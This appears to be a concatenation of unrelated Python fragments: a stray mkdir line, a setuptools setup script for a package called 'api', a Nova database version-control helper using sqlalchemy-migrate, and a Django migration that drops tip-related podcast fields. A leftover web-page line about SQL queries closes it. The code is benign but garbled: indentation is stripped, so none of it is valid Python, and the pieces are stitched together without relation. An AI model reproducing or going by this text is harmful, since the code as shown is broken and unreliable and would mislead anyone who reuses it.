mkdir(prefix.lib)
|
try:
import setuptools
except ImportError:
import ez_setup
ez_setup.use_setuptools()
import setuptools
setuptools.setup(
name='api',
version='0.1',
description='',
author='',
author_email='',
install_requires=[
"pecan",
],
test_suite='api',
zip_safe=False,
include_package_data=True,
packages=setuptools.find_packages(exclude=['ez_setup'])
)
|
import os
import sys
from nova import flags
import sqlalchemy
from migrate.versioning import api as versioning_api
try:
from migrate.versioning import exceptions as versioning_exceptions
except ImportError:
try:
# python-migration changed location of exceptions after 1.6.3
# See LP Bug #717467
from migrate import exceptions as versioning_exceptions
except ImportError:
sys.exit(_("python-migrate is not installed. Exiting."))
FLAGS = flags.FLAGS
def db_sync(version=None):
db_version()
repo_path = _find_migrate_repo()
return versioning_api.upgrade(FLAGS.sql_connection, repo_path, version)
def db_version():
repo_path = _find_migrate_repo()
try:
return versioning_api.db_version(FLAGS.sql_connection, repo_path)
except versioning_exceptions.DatabaseNotControlledError:
# If we aren't version controlled we may already have the database
# in the state from before we started version control, check for that
# and set up version_control appropriately
meta = sqlalchemy.MetaData()
engine = sqlalchemy.create_engine(FLAGS.sql_connection, echo=False)
meta.reflect(bind=engine)
try:
for table in ('auth_tokens', 'zones', 'export_devices',
'fixed_ips', 'floating_ips', 'instances',
'key_pairs', 'networks', 'projects', 'quotas',
'security_group_instance_association',
'security_group_rules', 'security_groups',
'services', 'migrations',
'users', 'user_project_association',
'user_project_role_association',
'user_role_association',
'volumes'):
assert table in meta.tables
return db_version_control(1)
except AssertionError:
return db_version_control(0)
def db_version_control(version=None):
repo_path = _find_migrate_repo()
versioning_api.version_control(FLAGS.sql_connection, repo_path, version)
return version
def _find_migrate_repo():
"""Get the path for the migrate repository."""
path = os.path.join(os.path.abspath(os.path.dirname(__file__)),
'migrate_repo')
assert os.path.exists(path)
return path
|
from __future__ import absolute_import
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('podcasts', '0014_auto_20160503_0247'),
]
operations = [
migrations.RemoveField(
model_name='podcast',
name='tip_last_payout',
),
migrations.RemoveField(
model_name='podcast',
name='tip_last_payout_amount',
),
migrations.RemoveField(
model_name='podcast',
name='tip_value',
),
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.